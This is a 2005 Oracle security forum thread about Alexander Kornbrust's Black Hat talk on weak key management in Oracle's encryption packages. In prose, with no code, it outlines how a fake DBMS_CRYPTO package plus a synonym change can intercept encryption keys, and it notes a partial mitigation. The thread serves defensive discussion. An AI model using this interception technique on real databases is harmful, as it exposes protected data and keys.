Pete Finnigan's Oracle Security Forum (http://www.petefinnigan.com/forum/yabb/YaBB.cgi)
Oracle Security >> Oracle Security >> Alexander Kornbrust - Black Hat 2005 Presentation
(Message started by: rado on Jul 27th, 2005, 7:51am)

Title: Alexander Kornbrust - Black Hat 2005 Presentation
Post by rado on Jul 27th, 2005, 7:51am
What do you think about the latest info coming from Alex Kornbrust. It seems that there is no safe way to keep the data inside the database secured. Is there someone who attend this Black Hat presentation and who could write in the forum more details about Alex's findings.
URL from the news:
Oracle's encryption not secure, researcher says (http://www.computerworld.com/securitytopics/security/holes/story/0,10801,103473,00.html?source=NLT_PM&nid=103473)
The best encryption that DBMS_OBFUSCATION_TOOLKIT offers is 192-bit encryption by using Triple DES (3DES) algorithm in Oracle9i. I don't know how this is changed in 10g but it seems that it doesn't matter because anyway, everyone who have an DBA account could decrypt the data. Is the Transparent Data Encryption (coming with 10g) the only preferable way to keep the data secure, especially when there is requirement that is coming from "security company standards". For example, I know that for all companies that are working with Visa, there is a requirement for at least 256-bit or 512-bit (I am not sure) encryption key that they must used.
I just want to initiate some discussion about this subject - "How to keep our data secured within an Oracle database by using encryption"

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by Pete Finnigan on Jul 27th, 2005, 2:33pm
Hi Rado,

Thanks for your post about Alex's talk at Black Hat in Las Vegas. I have seen the text for his talk and was also aware of the news article you mention but I don't think I can talk about specific details here yet as I don't know if it has been given yet or whether the talk notes would be made public. I am reasonably sure Alex will publish them on his own site Red Database Security (http://www.red-database-security.com) when he gets back.

That said we can still discuss the general issue. I want to make two points really for now. The first is that the underlying problem with Oracle's DBMS_OBFUSCATION_TOOLKIT and DBMS_CRYPTO packages is not the algorithms themselves but the issue of key management.  This is an issue to which Alex alludes in his talk. There are other issues as well.

The second issue is that at present TDE in 10gR2 doesn't on the surface look any more secure that the previous methods employed by Oracle. A number of bugs have already been found in TDE that allows the keys to become known easily.

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by rado on Jul 27th, 2005, 3:24pm
Hi, Pete

Thank you for your reply. Oracle are doing many efforts for improving the database security but for now there are so many bugs and findings that are discovered very frequently. The last thing - "patch for the security patch" doesn't sounds well.

I am supporting the idea for opening of this kind of forum - related mainly to Oracle security and I hope that it will become very popular.

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by Pete Finnigan on Jul 27th, 2005, 4:42pm
Hi Rado,

Thanks for your reply. Yes you are right at the moment there are a lot of issues with bugs, patches that need to be patched, silent fixes, advisories released for unfixed bugs and of course the fact that a lot of bugs are still not fixed (those reported on sites such as Red Database Security (http://www.red-database-security.com) and Argeniss (http://www.argeniss.com))but we should not forget that Oracle have made some great strides forward with new functionality (TDE, OS audit as xml, FGA and RLS...) in recent years and also they have improved their patch process a bit - at least on the documentation side - there needs to be work done on getting fixes done quicker and also on their recent problems of patches for patches, quality and testing. But it is better than random security advisories we had before that no one knew when to expect that included much less details.

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by rado on Jul 29th, 2005, 7:41am
Hi All,

For everyone who is interested - the link for the previously mentioned presentation:
http://www.blackhat.com/presentations/bh-usa-05/BH_US_05-Kornbrust/BH_US_05-Kornbrust.pdf (http://www.blackhat.com/presentations/bh-usa-05/BH_US_05-Kornbrust/BH_US_05-Kornbrust.pdf)

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by Pete Finnigan on Jul 29th, 2005, 3:21pm
Hi Rado,

Have you managed to open it? I tried to view it in IE and also downloaded it but neither option worked. I have emailed blackhat to ask if it is a problem their end.

cheers

Pete

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by Pete Finnigan on Jul 29th, 2005, 3:26pm
Plus, forgot to mention Esteban Martínez Fayó - presentation is available here (http://www.blackhat.com/presentations/bh-usa-05/BH_US_05-Fayo/BH_US-05-Fayo.pdf) and Cesar Cerrudo's is available here (http://www.blackhat.com/presentations/bh-usa-05/BH_US_05-Cerrudo.pdf). At the moment I cannot read theirs either..:-( - I will get a newer version of acrobat and see if that works. As far as I know Alex, Esteban, Cesar and David Litchfield were the only ones to talk about Oracle

cheers

Pete

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by rado on Jul 29th, 2005, 3:40pm
Hi, Pete

I sent them as three attached pdf files to you official email.

Best regards

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by kornbrust on Aug 4th, 2005, 2:59pm
Hello

an updated version of the presentation is available on my website:


Cheers

Alexander Kornbrust

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by Pete Finnigan on Aug 4th, 2005, 3:42pm
Thanks Alex,

welcome to the forum!

cheers

Pete

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by kornbrust on Aug 4th, 2005, 6:34pm
Hello

here a short summary of my presentation. Interception of encryption keys is easy if a hacker (or DBA) installs a special package which intercepts all parameters and pass the parameter to the original package. DBA permission is not always required.


1. Install a dbms_crypto package with the same specification as the original dbms_crypto.

Sample see dbms_crypto_fake.sql

2. Create a private synonym or modify the public synonym.

That's all. You find all encryption keys in the log file of your web server.


It is possible to mitigate the risk (a little bit) by

 * using full qualified names (e.g. SYS.DBMS_CRYPTO)



Regards

Alex

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by Joshua Wright on Aug 5th, 2005, 8:35pm
Alex,

Your presentation materials are awesome.  I really enjoyed reading them, especially the nonsense quotes in the beginning of the presentation.

Thank you,

-Josh

Title: Re: Alexander Kornbrust - Black Hat 2005 Presentat
Post by kornbrust on Aug 6th, 2005, 2:59pm
Josh,

Most people believe that the product documentation or specialised books are saying the truth.

DBMS_CRYPTO/DBMS_OBFUCSATION_TOOLKIT is nearly useless in the current architecture. This has also side effects to the Oracle product stack.

Oracle itself is not able to store the passwords/data in a secure manner. That is probably the reason why Oracle itself is using dbms_crypto/dbms_otk very rarely.  I know only 4 components (ultrasearch, MGW, DM and Grid Control) in the database which are using dbms_crypto/otk.

Regards

Alex



Powered by YaBB 1 Gold - SP 1.4!
Forum software copyright © 2000-2004 Yet another Bulletin Board